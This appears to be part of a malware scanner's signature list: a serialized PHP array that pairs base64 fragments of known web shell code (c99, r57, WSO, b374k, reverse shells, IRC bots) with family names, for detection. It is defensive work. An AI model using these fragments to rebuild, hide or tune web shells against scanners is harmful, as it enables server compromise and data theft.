+s:64:"7IAogICAgICAgIGZvbnQtZmFtaWx5OiBUZXJtaW51cywgRml4ZWRzeXMsIEZpeGV"; +s:23:"fuckphpshell[0][0][php]"; +s:64:"Y2ZzYXZlY29udGVudD4NCjxwcmU+DQojbXlWYXIjDQo8L3ByZT4NCjwvY2ZpZj4N"; +s:17:"cfexec[0][0][cfm]"; +s:64:"1VrR01CemNaT2IvbDZEMUknLCdwU1gyMU82L3c3ajhlVzBIUmdJdGdFM0NIYkVNY"; +s:19:"phpshell[9][0][php]"; +s:64:"nZkVzUwS0NSa2JDa3VKeUJ6ZFdOalpYTnpJQ2N1SkhOMVkyTXVKeUJtWVdsc0lDY"; +s:17:"phpspy[0][0][php]"; +s:64:"AmJiAoQGlzX3JlYWRhYmxlKCIkZGlyLyRmaWxlIikpICkKIAkJCQllY2hvIGJ1aW"; +s:19:"phpshell[0][0][php]"; +s:64:"CmlmICghZW1wdHkoJHdvcmtfZGlyKSkgewogIC8qIEEgd29ya2RpciBoYXMgYmVl"; +s:23:"ayyildiz_tim[0][0][php]"; +s:64:"kc1aGRISnBlQ0E5SUNReE95QU5DaUFnSUNBZ0lDQWdJQ0FnSUcxNUlGd2tZWEpuS"; +s:15:"c100[2][0][php]"; +s:64:"SgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXsKICAKICBpZ"; +s:23:"simple_shell[1][0][php]"; +s:64:"5MWW1WU2MybG9kRUV5WmxoM1FVWTFOazVJZW1Kek9XVlZNbE5HTml0TicuCidiVX"; +s:14:"fx0[2][0][php]"; +s:64:"MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMgZHVtcCB2YX"; +s:23:"includeshell[0][0][php]"; +s:64:"dBalB5Vlp2VkNCQmtZSjIvN0F5Q3ZiY2E0SE43SDlJR3FrY0JaTGQxa0NCR0dDb1"; +s:25:"cocacola_shell[1][0][php]"; +s:64:"BOQ21sbUtHbHpjMlYwS0NSZlIwVlVXeWQwYlhBblhTa3BEUW9nZXcwS0lDQWdRSF"; +s:15:"r57[13][0][php]"; +s:64:"C9ESVY+PC9URD48L1RSPgo8PyBpZigkY2hkaXIhPWdldGN3ZCgpKXs/Pgo8VFI+P"; +s:16:"dtool[0][0][php]"; +s:64:"R0lGODlhMQo8P3BocCAKZXZhbChiYXNlNjRfZGVjb2RlKCdhV1lnS0dsemMyVjBL"; +s:15:"cmd[26][0][php]"; +s:64:"IuJGdyb3VwX3dyaXRlLiI+PC9mb250PjwvdGQ+PHRkIGJnY29sb3I9XCIjQ0NDQ0"; +s:17:"andr3a[0][0][php]"; +s:64:"BocE15QWRtaW4vIFxyXG4iOwokZGF0YSAuPSIjIGh0dHA6Ly93d3cucGhwbXlhZG"; +s:17:"backup[0][2][php]"; +s:64:"kZSgkZmlsZSk7CiAgICAgaWYgKGZ1bmN0aW9uX2V4aXN0cygiYmFzZW5hbWUiKSk"; +s:19:"safemode[2][0][php]"; +s:64:"4nKTsKCgogIGVycm9yX3JlcG9ydGluZyhFX1dBUk5JTkcpOwogIGluaV9zZXQoIm"; +s:15:"erne[1][0][php]"; +s:64:"djdyUW9sTnY2Nm5iUEU5UHptMDdudkQxSWI0MWhzVTFWSjdTMEVRbk9yZHZXei9i"; +s:20:"phpshell[22][0][php]"; +s:64:"Y21kWzBdKTsKICAgICAgICAgICR2aG9zdCA9IGV4cGxvZGUoIkAiLCRuaWNrWzFd"; +s:21:"nogrodpBot[0][1][php]"; +s:64:"ydjb3B5X2J5cGFzcyddKSkKICAgICAgIHsKICAgICAgICAgCiAgICAgICAgICBpZ"; +s:21:"mulcishell[0][0][php]"; +s:64:"9Cw0YDQsNC80LXRgtGAMicsCidydV90ZXh0NzEnPT4i0JLRgtC+0YDQvtC5INC/0"; +s:19:"spyshell[0][0][php]"; +s:64:"3Rpb24gbGlzdGluZyAoJGxpc3QpIHsKCWdsb2JhbCAkZGlyZWN0b3J5LCAkaG9tZ"; +s:19:"webadmin[3][2][php]"; +s:64:"mknLCdnTzlTMHViSnlFWmVISW5YWUZLdEEnLCdhWmVjY21TUHdrUWFodkMybk9kd"; +s:19:"phpshell[7][0][php]"; +s:64:"mNCMjY2alFaNGZ5cHhMbXVGT2hZbVNvVzFTTXZ3dnB1dzl0Mnlad1ZXek1LTEtKe"; +s:19:"orbshell[0][0][php]"; +s:64:"XU2gwUVFEdDg5ZkpjdjhDNzQrRDZoTDRSYndOdk5ZN1M1R0xsT0phdGF5QzJzajl"; +s:20:"phpshell[18][0][php]"; +s:64:"IiB2YWx1ZT1cIiIuJHNxbHBhc3MuIlwiIC8+DQoJCQkJCTxpbnB1dCB0eXBlPVwi"; +s:16:"b374k[9][0][php]"; +s:64:"0RRb2dKR2x1YWlBOUlDUmZVMFZTVmtWU1d5SlNSVkZWUlZOVVgxVlNTU0pkT3cwS"; +s:20:"filesman[17][0][php]"; +s:64:"0ZzSUQwZ0owbE8KVTBWU1ZDQkpUbFJQSUNjdUpIUmhZbXhsTGljZ0tDY3VhVzF3Y"; +s:15:"wso[16][0][php]"; +s:64:"bCA9ICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddOwogICAkZGV6ID0gJHB3ZGRpci4i"; +s:14:"cmd[1][0][php]"; +s:64:"gICBlY2hvICI8dGFibGUgYm9yZGVyPScxJyB3aWR0aD0nNjAlJz48dHI+PHRkPiR"; +s:22:"onboomshell[0][0][php]"; +s:64:"nRVg5T0JuVjhYTjd2UUZhK3ZxbWhoQUxSajdyQVQ1ZEgrdndLbHRCcXdYLzNPeFZ"; +s:14:"fx0[0][0][php]"; +s:64:"zaCgkcGF0aCk7DQoJfQ0KDQoJd2hpbGUgKHN0cnBvcygkcGF0aCwgJHBhdHRlcm4"; +s:19:"webadmin[4][2][php]"; +s:64:"Qo/Pg0KPEZPUk0gbWV0aG9kPVBPU1QgRU5DVFlQRT0ibXVsdGlwYXJ0L2Zvcm0tZ"; +s:26:"shell_uploader[12][0][php]"; +s:64:"UFBQUFRQUJBQWd3QUFBUC8vLy8vTW1jek1tZi9NekptWlpzek16UC8vekFBQSIuC"; +s:20:"ctt_shell[0][0][php]"; +s:64:"9yZWFjaCgkcmV0IGFzICRzaXRlKSBlY2hvKCI8bGk+JHNpdGVcbiIpOw0KICAgIG"; +s:19:"hackerps[1][0][php]"; +s:64:"mRvV3A2WDhiVjl6a0t3enNqUnZ1RFlXcDYyMmZwOERzVzQycnRsWUVjZGgzUnJUb"; +s:20:"stunshell[0][0][php]"; +s:64:"woJCXN1cGVyKG5ldyBCb3JkZXJMYXlvdXQoKSk7CgkJCgkJdGV4dCA9IG5ldyBKY"; +s:19:"javashell[0][0][py]"; +s:64:"YnV0dG9uIG9uY2xpY2s9XCJ0ZXN0X3Byb21wdCgyKVwiIHZhbHVlPVwiIi5ldCgn"; +s:25:"phpfilemanager[3][2][php]"; +s:64:"Z3dZc3ZGQytldmxjS0NjVHhnODFzdzh0WERjRDNaOFFoMERadlkrb2l2ZlcrblBw"; +s:16:"b374k[3][0][php]"; +s:64:"wiY28uaWQiLCJpZSIsImNvLmlsIiwiY28uaW0iLCJjby5pbiIsImlzIiwiaXQiLC"; +s:27:"scanner_jatimcrew[0][0][pl]"; +s:64:"M0NTY3ODkwKS4iKzAiKTsgfSBlbHNlIHsgaWYgKEBtYWlsKCR2MDFiNmUyMDMsIC"; +s:20:"phpshell[30][0][php]"; +s:64:"9ybS5zdWJtaXQoKSI+Cjw/cGhwCi8qIE5vdyB3ZSBtYWtlIGEgbGlzdCBvZiB0aG"; +s:19:"phpshell[4][0][php]"; +s:64:"1QzZHVaWEl2UjNKdmRYQThMMkkrUEM5MFpENDhkR1ErSUNJN0lDQWdJQ0FnRFFvZ"; +s:15:"r57[11][0][php]"; +s:64:"1x4MDBceDAwXHgwMFx4ZTlceGIwXHhmZVx4ZmZceGZmXHhmZlx4MjVceGNhXHg1M"; +s:26:"shell_uploader[17][0][php]"; +s:64:"FI3SUxhN3o4eFFSeVNUWDlTckNpeFFSeVNUWDlSMW8yRFFFSG5yRjJFQjUyRFFua"; +s:27:"brute_force_tool[2][0][php]"; +s:64:"FuYSwgSGVsdmV0aWNhOyBURVhULURFQ09SQVRJT046IG5vbmUKfQouY29udGVudC"; +s:16:"rader[0][0][asp]"; +s:64:"kJJUUpUVVM0R1dNQjhVRFV0UTVDc1Vxdkdudzd4S0dqRUNqR0JDMkl5Q1M5djFTR"; +s:25:"shell_uploader[8][0][php]"; +s:64:"0+JGN5YmVyMTczX2RlY29kZSgpOw0KLyogdGFua3MgZm9yOiBNcl9HYW5EcnVuWC"; +s:21:"cybershell[2][0][php]"; +s:64:"To8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ib2xkbmFtZSIgdmFsdWU9IjBsZCBuY"; +s:20:"nexpl0rer[0][0][php]"; +s:64:"ycsJ2JzaGVsbCc9PidCaW5kc2hlbGwnLCdraWxsJz0+J0tpbGwgU2hlbGwnKTsNC"; +s:15:"goon[0][0][php]"; +s:64:"AgICA8Zm9udCBzaXplPSIyIiBmYWNlPSJUYWhvbWEiPkZ0cCA8L2ZvbnQ+DQogIC"; +s:17:"cpanel[2][0][php]"; +s:64:"biAiLiJQQzkwIFogIi4iWCAiLiJoMCBZICIuIlhKbFlUNG5PMzAgTiBDIi4ibVZq"; +s:23:"simple_shell[2][0][php]"; +s:64:"YWR6MnJ4NHVlNjMyN3ExWg0KUEwzSU52dlp4L3BEL3paZktEN2ROS2Y1MDBJcGsz"; +s:16:"fenix[0][0][php]"; +s:64:"hjb2RlZCBieSBkaW5nZ28pLS0+PC9mb250PjwvY2VudGVyPgoiOwoKCmlmICghaX"; +s:16:"mysql[2][0][php]"; +s:64:"iPg0KPHRleHRhcmVhIHJvd3M9IjE5IiBuYW1lPSJTMSIgY29scz0iODciPic7DQp"; +s:26:"itsecteam_shell[0][0][php]"; +s:64:"bGRlcixUUlVFDQpyZXNwb25zZS53cml0ZSgiRm9sZGVyOiAiICYgc2VsRm9sZGVy"; +s:18:"ntdaddy[1][0][asp]"; +s:64:"vWFMKUVJTQkY4dDZYVE4yWUhiUWx6VVlrNnFpdUlsbFNzdXpxa29HV05iWmh1d2Y"; +s:16:"b374k[0][0][php]"; +s:64:"U0VMRiddLiI/YWN0PW1hbmFnZXImZGVsPSIuJGRjLiI+RGVsPC90ZD4iOwokZGly"; +s:17:"nshell[1][0][php]"; +s:64:"AidGltZW91dCIKCWVsc2U6CQoJCWlmIHB3X2luID09IFBXOgkKCQkJY29ubi5zZW"; +s:21:"phytonshell[0][0][py]"; +s:64:"nBvcGVuIikpew0KZnVuY3Rpb24gbXlzaGVsbGV4ZWMoJGNvbW1hbmQpIHsNCmlmI"; +s:21:"locusshell[1][0][php]"; +s:64:"jbHVkZSgiL2V0Yy9wYXNzd2QiKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTs"; +s:20:"rootshell[2][0][php]"; +s:64:"G1wV0FPQVdYUTBuNUJRPT0nKSkpOyB9DQplbHNlIHsgZXZhbChnemluZmxhdGUoY"; +s:25:"shell_uploader[5][0][php]"; +s:64:"+PGJyPic7DQplY2hvICdTZXJ2ZXIgaW5mb3JtYXRpb25zPGJyPjxicj4nOw0KZWN"; +s:19:"backdoor[0][0][php]"; +s:64:"QzQ4Vk5lekhPdG83bUVzNHZ6V0hEcHFHdGxhN0g3c2Q5UCs3QjZISjBWcXg4dTd5"; +s:29:"gohack_powerserver[0][0][php]"; +s:64:"AgICAgICAgICAgbXkgJG5hdHJpeCA9ICQxOw0KICAgICAgICAgICAgbXkgJGFyZy"; +s:18:"shellbot[2][0][pl]"; +s:64:"YoICRfUE9TVFsnX2VkaXQnXSApIHsKCWVjaG8gJzxicj48Zm9ybSBuYW1lPSJ0ZX"; +s:15:"cmd[32][0][php]"; +s:64:"GUwXHg2Nlx4ODlceDQ1XHhjZVx4ZThceGFhXHhmMlx4ZmZceGZmXHg4M1x4YzRce"; +s:24:"shell_exploit[0][0][php]"; +s:64:"FrOwoJCWNhc2UgNToKCQkJZm9yKDskX1BPU1RbJ3AyJ10gPD0gJF9QT1NUWydwMy"; +s:19:"orbshell[1][0][php]"; +s:64:"RfUE9TVFsiZiJdID8+DQo8PyB9ID8+DQo8PyAkdGVzdF9mdW5jID0gY3JlYXRlX2"; +s:14:"cmd[9][0][php]"; +s:64:"RQWZna3JNMndDcDVlV0RNNHJ3eUMvV0RwUzN0Q3R0RVE2WTJrY1pGTm9wRG9pSjR"; +s:19:"akatsuki[0][0][php]"; +s:64:"TRVJWRVJfVkFSU1snSFRUUF9YX0ZPUldBUkRFRF9GT1InXSkpewogIGVjaG8gIjx"; +s:14:"gfs[1][0][php]"; +s:64:"XTXhmREN3U0xHTXVwSUV4S0VuVXAvd2xkcWRYdlJidVBocGhZMXE2cmI4VmZKZ0Z"; +s:17:"b374k[10][0][php]"; +s:64:"jA3Q2lScFlXUmtjajFwYm1WMFgyRjBiMjRvSkhSaGNtZGxkQ2tnZkh3Z1pHbGxLQ"; +s:17:"coderz[0][0][php]"; +s:64:"kNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUga"; +s:19:"priv8_scr[1][0][pl]"; +s:64:"cxJzsKCmlmKCRfU0VTU0lPTlsnYW4nXT09MCl7CmVjaG8gJGhlYWRlcjsKZWNoby"; +s:25:"antichat_shell[0][0][php]"; +s:64:"w+CjxoZWFkPgo8dGl0bGU+UnUyNFBvc3RXZWJTaGVsbCAtICIuJF9QT1NUWydjbW"; +s:14:"cmd[2][0][php]"; +s:64:"PL8ICAgICAgICAgICAgXCIgPiI7CmVjaG8gIgo8aHIgd2lkdGg9XCIxMDAlXCIgc"; +s:21:"cybershell[0][0][php]"; +s:64:"E1UitQRkJRM0VvbWdSNHRibHpZZUFWbjQvU3c1NmxqWkNwQjVtWHBxbmM5RkZBMW"; +s:20:"hostdevil[1][0][php]"; +s:64:"V9lbmQxLiRmZTsKfQppZigkbXlzcWxfb258fCRtc3NxbF9vbnx8JHBnX29ufHwkb"; +s:15:"r57[16][0][php]"; +s:64:"gkbiwkdHh0PScnKQp7CmVjaG8gJzx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW"; +s:14:"r57[8][0][php]"; +s:64:"kcmVzOw0KCQkJfQ0KCQl9DQoJCSRzdWNjZXNzID0gMDsNCgkJJGF0dGVtcHRzID0"; +s:14:"wso[1][0][php]"; +s:64:"WFuZCddKSkNCg0KCQkJCQl7DQoNCgkJCQkJCXByaW50ICI8cHJlPiI7DQoNCgkJC"; +s:20:"ironshell[0][0][php]"; +s:64:"CAgICAiMjE4XC4xOFwuMTc0XC4yNyIsDQogICAgICAgICI2NVwuMzNcLjg3XC45N"; +s:24:"spam_trustapp[1][1][php]"; +s:64:"mMjBmODgzZSI7CiRjb2xvciA9ICIjZGY1IjsKJGRlZmF1bHRfYWN0aW9uID0gJ0Z"; +s:20:"filesman[15][0][php]"; +s:64:"SgkX1NFUlZFUlsnSFRUUF9IT1NUJ10uJ19NeVNRTC5zcWwnKTsKCgoKCWhlYWRlc"; +s:17:"phpspy[1][0][php]"; +s:64:"PD9waHAgcGFzc3RocnUoZ2V0ZW52KCJIVFRQX0FDQ0VQVF9MQU5HVUFHRSIpKTsg"; +s:26:"accept_language[0][0][php]"; +s:64:"kX1BPU1RbJ3AxJ10gPT0gJ3llcycpCgkJaWYoQHVubGluayhwcmVnX3JlcGxhY2U"; +s:20:"filesman[21][0][php]"; +s:64:"0ic2NhbnR5cGUiPg0KICAgICAgICAgPG9wdGlvbiB2YWx1ZT0iMSI+DQogICAgIC"; +s:20:"filesman[25][0][php]"; +s:64:"wZSIsICJ3IiksICAvLyBzdGRvdXQgaXMgYSBwaXBlIHRoYXQgdGhlIGNoaWxkIHd"; +s:22:"shellatildi[1][0][php]"; +s:64:"3JzJywgMCk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQpAc2V0X21hZ2ljX3F1b3Rlc"; +s:20:"1n73ction[0][0][php]"; +s:64:"kYXRhJ30uDQojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmc"; +s:19:"cgi-shell[0][0][pl]"; +s:64:"yaW5nIGRzdFBhdGgpIHsKCWJvb2xlYW4gYlJldCA9IHRydWU7CgkKCXRyeSB7Cgk"; +s:23:"jspwebshell[0][0][java]"; +s:64:"BpYjNWMGNIVjBJaUIyWVd4MVpUMGlKenNnWldOb2J5QWtiM1YwY0hWME95QmxZMm"; +s:15:"cmd[33][0][php]"; +s:64:"gPD9waHANCi8qIE5vdyB3ZSBtYWtlIGEgbGlzdCBvZiB0aGUgZGlyZWN0b3JpZXM"; +s:23:"ayyildiz_tim[1][0][php]"; +s:64:"0N3ZW04L1QvY3ZoY2EyZEszVktKL2U3K3k4WGR5OEhlaTU3TU05WXBVdy9Iby8za"; +s:15:"c99[18][0][php]"; +s:64:"GZ1bmN0aW9uX2V4aXN0cygnb2NpX2Nvbm5lY3QnKSkgDQogICAgICAgICR0ZW1wW"; +s:20:"filesman[13][0][php]"; +s:64:"X3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOwokbGl6MD1zaGVsbF9leGVjKCRfUE9T"; +s:18:"lizozim[0][0][php]"; +s:64:"gbnVsbDsKJHVkID0gdXJsZW5jb2RlKCRkKTsKPz4KPGh0bWw+PGhlYWQ+PG1ldGE"; +s:14:"c99[6][0][php]"; +s:64:"GVjaG8gIiRfU0VSVkVSW1BIUF9TRUxGXSIgOyA/PiIgbWV0aG9kID0gInBvc3QiP"; +s:22:"remoteshell[0][0][php]"; +s:64:"VcMTYyXHg3MFx4N2NcMTU1c25cMTQyXHg2Zlx4NzR8Y1x4NzJcMTQxXDE2N2xlcn"; +s:26:"shell_uploader[16][0][php]"; +s:64:"wM3pXS25SZkliRmh0UDVxRW1HN1VxWUxQVExoVHRUd09vbHJMU0JDd3QxdkNhRkF"; +s:21:"nogrodpBot[1][1][php]"; +s:64:"Bpc2Foa2FuIGRlbmdhbiBzcGFzaQ0KDQovKioqIEFkbWluICoqKi8NCiRhZG1pbi"; +s:21:"gaulircbot[0][2][php]"; +s:64:"2hvICIgIDx0ZCBub3dyYXAgY29sc3Bhbj1cIjZcIiBzdHlsZT1cInBhZGRpbmctb"; +s:15:"erne[0][0][php]"; +s:64:"NpemU9MTEwPjwvZm9ybT48L2NlbnRlcj48YnI+CiI7CmlmKEAkX1BPU1RbJ3NoJ1"; +s:14:"img[0][0][php]"; +s:64:"x1c2goKTsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIHJlcGxhY2VOZX"; +s:19:"pwnshell[0][0][jsp]"; +s:64:"VydmVyWzFdLCAkbGluZVswXSwgJHRtcCkgKSB7DQ0KCQkJCQkJCSRzdWNjZXNzKy"; +s:19:"filesman[8][0][php]"; +s:64:"oJfQ0KfQ0KDQp3aGlsZSgkbGV2ZWwtLSkgY2hkaXIoIi4uIik7DQoNCiRjaCA9IG"; +s:26:"itsecteam_shell[1][0][php]"; +s:64:"I5MDRiOGNmYzQ4NDdjNTViNiI7IGlmKGlzc2V0KCRfUkVRVUVTVFsncHVmZG1yJ1"; +s:15:"cmd[29][0][php]"; +s:64:"VFU1RbJ2NtZCddKSl7DQogICAgICAgIGVjaG8gIjxwcmU+IjsNCiAgICAgICAgJG"; +s:15:"cmd[20][0][php]"; +s:64:"VQsICdVVEYtOCcpOwogICAgICB9CgogICAgICB3aGlsZSAoIWZlb2YoJGlvWzJdK"; +s:20:"diveshell[0][0][php]"; +s:64:"MTAwIiB2YWx1ZT0iPD8gZWNobyAkY3VyZGlyOyA/PiI+PC90ZD4KICAgICAgPHRk"; +s:20:"lamashell[1][0][php]"; +s:64:"lIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVsdGlwYXJ0L2Zvcm0tZGF0YT4gJG5vd2F"; +s:20:"phpshell[23][0][php]"; +s:64:"gdGVybXMgYXJlIG5vdCBhY2NlcHRhYmxlIHRvIHlvdSwgdGhlbg0KLy8gZG8gbm9"; +s:24:"reverse_shell[0][0][php]"; +s:64:"iBlbmNvdW50ZXJlZCBhbiBpbnRlcm5hbCBlcnJvciBvcgptaXNjb25maWd1cmF0a"; +s:19:"mohajer22[0][0][pl]"; +s:64:"oSWlGMUlIRWljU0FpSXlZaElpQXNJeVFnZHlFaEp5Y2lkaWNoSVNFaElTQXRJeTB"; +s:20:"filesman[19][0][php]"; +s:64:"lRzNYUjRkb3hnelJJV2NWTW5jcUV3TFc1enVwOVdjWWNtemVqUDdWNndMald3OW8"; +s:18:"webroot[0][0][php]"; +s:64:"hvICR0YWJsZV91cDI7CmVjaG8gJGZvbnQ7CmVjaG8gIjxiPiIud3MoMjcpLiRsYW"; +s:14:"r57[0][0][php]"; +s:64:"0tLS0tLS0tLS0tCgogIERpbSBvU2NyaXB0CiAgRGltIG9TY3JpcHROZXQKICBEaW"; +s:14:"cmd[0][0][asp]"; +s:64:"lYT4iOw0KJHNmbnQ9Ijxmb250IGZhY2U9dGFob21hIHNpemU9MiBjb2xvcj0jMDA"; +s:13:"mm[0][0][php]"; +s:64:"NDUk9MTEJBUi1BUlJPVy1DT0xPUjogIzM2M2Q0ZTsKU0NST0xMQkFSLVRSQUNLLU"; +s:18:"nstview[2][0][php]"; +s:64:"TIuNi40LXBsMi8nLAonL3BocE15QWRtaW4tMi42LjQtcGwzLycsCicvcGhwTXlBZ"; +s:29:"phpmyadmin_exploit[0][0][php]"; +s:64:"MlFmYnpKTXp3aCtCSUsKYkFPSTRjSG82V2M0ZytYTGhFT29peGV0eDlEbjNOamdP"; +s:16:"b374k[2][0][php]"; +s:64:"pOOVJaMEY2b21VNDY0Y0lPMEFjMUdyWUxkeWhMRDdUUHNEL3B0TSt5YW1sRDl6dD"; +s:26:"shell_uploader[13][0][php]"; +s:64:"eGtyb3JpID0gImE4YTQ3YzBhMTY3N2YwN2NhZWUwOGFkZmViNTkzZWQwIjsgaWYo"; +s:15:"cmd[35][0][php]"; +s:64:"vY2tldCk7DQp9DQpzZW5kcmF3KCRJUkNfY3VyX3NvY2tldCwgIlBSSVZNU0cgJHB"; +s:19:"empixcrew[0][0][pl]"; +s:64:"wvdHI+IjsNCg0KcHJpbnQgIjx0cj48dGQ+PGI+Q2hhbmdlIGRpcmVjdG9yeTo8L2"; +s:16:"worse[1][0][php]"; +s:64:"VVJFJ10uIjwvZm9udD48L3RkPiI7CnByaW50ICAgICI8L3RyPiI7CnByaW50ICAg"; +s:15:"winx[0][0][php]"; +s:64:"ZTNZYzJaWDdsdWN2NllGejZBZ0RlNXFaSGUxNStndkxvU01mNHlHQmx2NHZpMHhV"; +s:15:"wso[11][0][php]"; +s:64:"PXt9KTt2YXIgZz1jLmIuY2xpY2s7Z3x8KGc9Yy5iLmNsaWNrPXt9LGMub25jbGlj"; +s:17:"b374k[14][0][php]"; +s:64:"lx4ZjVceGQ2XHhjY1x4NmVceGJhXHgwZlx4MjRceGM2XHg5Y1x4NGVceGM0XHhlN"; +s:15:"c99[15][0][php]"; +s:64:"y8vOVRZNDA1V2ZxT212akkrYkhvYW9Rc01ReFIrdXVibjdidSswZi8vL3lINUJBR"; +s:17:"coderz[1][0][php]"; +s:64:"RlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYoISRzYWZlX21vZGUpDQogIC"; +s:14:"wso[9][0][php]"; +s:64:"PjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3By"; +s:16:"mysql[3][0][php]"; +s:64:"SduJz48Zm9udCBmYWNlPXRhaG9tYSBzaXplPS0yPjxiPm8tLS1bIFNuSXBFcl9TQ"; +s:22:"snipershell[1][0][php]"; +s:64:"FlbXE3TnF3OHNYQlkwMlY0d3QwRzlqdHdXTHJHeEhhbVFmTG04QXJSZDNmL3pmQz"; +s:20:"filesman[22][0][php]"; +s:64:"hcnJheSk7CiAgICAgICAgfQogICAgICAgICRfUE9TVCA9IHN0cmlwc2xhc2hlc19"; +s:14:"wso[3][0][php]"; +s:64:"tmZmhVWmozSHhMRURtcjFJZ0lncVV5Y2hLS3U4cjk2bUJESGtQSEg0anY4bS9KU0"; +s:15:"wso[10][0][php]"; +s:64:"fYnVmZl9wcmVwYXJlKCk7IA0KaWYgKCFmdW5jdGlvbl9leGlzdHMoImM5OV9zZXN"; +s:19:"phpshell[5][0][php]"; +s:64:"YjI1MElHTnZiRzl5UFNJak1EQkdSakF3SWo1M2QzY3VRWEpoWWkxQ2JHRmphMmho"; +s:24:"arab_black_hat[1][0][pl]"; +s:64:"gJGlzbGFzdCA9IGFycmF5KDAgPT4gVFJVRSk7CgllY2hvKCIJPHRyPlxuIik7Cgl"; +s:19:"webadmin[0][2][php]"; +s:64:"2Fic29sdXRlJzsKX3Euc3R5bGUud2lkdGggPSAnMTZweCc7Cl9xW19uXSgnZnJhb"; +s:16:"pzadv[1][1][php]"; +s:64:"PD9waHAKJGVudHJ5X2xpbmU9IkhBQ0tlZCBieSBFbnRyaUthIjsKJGZwID0gZm9w"; +s:18:"entrika[0][0][php]"; +s:64:"leHQ1NCc9PifDj8Ouw6jDscOqIMOyw6XDqsOxw7LDoCDDoiDDtMOgw6nDq8Ogw7U"; +s:14:"r57[3][0][php]"; +s:64:"nWTJGelpTQWljR1JtSWpvZ0pHTjBlWEJsUFNKaGNIQnNhV05oZEdsdmJpOXdaR1l"; +s:19:"b64shell[0][0][php]"; +s:64:"OSUw4UU1yWFVjY0pGYkx6bkJ0M0NxYWI5dlF4V2hLUGF2K29hMkFyUWZ3SjY4L0J"; +s:20:"stunshell[3][0][php]"; +s:64:"m5lY3RCYWNrIEJhY2tkb29yIHZzIDEuMCBieSBMb3JEIG9mIElSQU4gSEFDS0VSU"; +s:25:"backdoorconnect[0][0][pl]"; +s:64:"ibm9odXAgL3RtcC9uc3RfYmQgJiIpOwp1bmxpbmsoIi90bXAvbnN0X2NfYmQuYyI"; +s:18:"nstview[1][0][php]"; +s:64:"lOw0KDQogICB9DQoNCg0KDQpmdW5jdGlvbiBnZXRfcGVybXMoJGZuKQ0KDQp7DQo"; +s:20:"n3fa5t1ca[0][0][php]"; +s:64:"WCcuJzJOdmJuJy4nUmxlSFInLidmWTNKbFlYUicuJ2wnKSxiYXNlNjRfZGVjb2Rl"; +s:17:"iframe[0][0][php]"; +s:64:"MTwlQCBQYWdlIExhbmd1YWdlPSJKc2NyaXB0IiU+PCVldmFsKFJlcXVlc3QuSXRl"; +s:15:"cmd[36][0][php]"; +s:135:"bb:JF9bXT0rKyRfXzsgJF9bXT0kX1stLSRfX11bJF9fPj4kX19dOyRfWyRfX10uPSgoJF9fKyRfXykrICRfWyRfXy0kX19dKS4oJF9fKyRfXyskX18pKyRfWyRfXy0kX19dOw=="; +s:15:"cmd[27][0][php]"; +s:64:"dGZvcm0nXSkpDQogICAgew0KICAgICAkZiA9ICRfR0VUWydmaWxlJ107DQogICAg"; +s:19:"120667kk[0][0][php]"; +s:64:"NL3dBdTJ1blJhelJqVUlyYXNQc2pXUWV4K09FcEpDWnpTRzRkQzFYSjZzS0NUWkN"; +s:20:"stunshell[4][0][php]"; +s:64:"j48aW5wdXQgbmFtZT0iY21kIiB0eXBlPSJ0ZXh0IiBzaXplPSIxMzgiIHZhbHVlP"; +s:15:"cmd[28][0][php]"; +s:64:"8L3RhYmxlPiI7CgogJHBlcmRpciA9IEBwZXJtaXNzaW9ucyhmaWxlcGVybXMoJHR"; +s:16:"xinfo[0][0][php]"; +s:64:"NfYXJyID0gJG5vdGxzID0gbnVsbDsKJHVkID0gdXJsZW5jb2RlKCRkKTsKPz48aH"; +s:15:"c99[11][0][php]"; +s:64:"rQmpHTVk2N1BCTXJ1dzhjNXRlTjI1dkRFV245bkljajlzQm9pbWN2ZUVuSGE4QWU"; +s:20:"phpshell[21][0][php]"; +s:64:"iAgICAgIGJyZWFrOw0KICAgfQ0KDQogICAvLyBXYWl0IHVudGlsIGEgY29tbWFuZ"; +s:22:"shellatildi[0][0][php]"; +s:64:"R0aUo2MHkzMXBBT3BERnlKZUdob05UbXBOcThCV3MweWF6OElzTGxCbU1mQk9ld2"; +s:19:"filesman[4][0][php]"; +s:62:"IChuc3QpIHdoaWNoIGx5bngNCklzIGxpbmtzIGluc3RhbGxlZD8gKG5zdCkgd2"; +s:18:"nstview[3][0][php]"; +s:64:"bWFpbChzKSEiKTsNCg0KfQ0KZWNobyAiU3VjY2Vzc2Z1bGx5IHNlbnQgbWFpbChz"; +s:23:"blood3rpriv8[0][0][php]"; +s:64:"ZT0idGV4dCIgbmFtZT0ibnJlbmFtZSI+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2"; +s:22:"stakershell[0][0][php]"; +s:64:"gPSAiZnVuY3Rpb25zIikgewogICAgICAgICAgICBpZiAoJHN0YXRlPT0xKSB7CiA"; +s:16:"mysql[5][0][php]"; +s:64:"A9ICJkZXZpbHpTaGVsbCI7DQokc2hlbGxfZmFrZV9uYW1lID0gIlNlcnZlciBMb2"; +s:22:"devilzshell[1][0][php]"; +s:64:"yYjMTYwNTsmIzE2MDg7JiMxNjAyOyYjMTU5Mzs8L2ZvbnQ+PC9zcGFuPjxmb250I"; +s:14:"c99[7][0][php]"; +s:64:"hbWUpOw0KfQ0KZWxzZWlmKCRfUE9TVFsndHlwZSddPT03KQ0Kew0KZWNobyBhbGl"; +s:20:"rootshell[0][0][php]"; +s:64:"RzhOeGswb1BkR1lGY2NBWEVTTTRta1dKTDM1L2ZqUTQ0TDhzVTRFM2oxT1ZpbFBn"; +s:14:"c99[3][0][php]"; 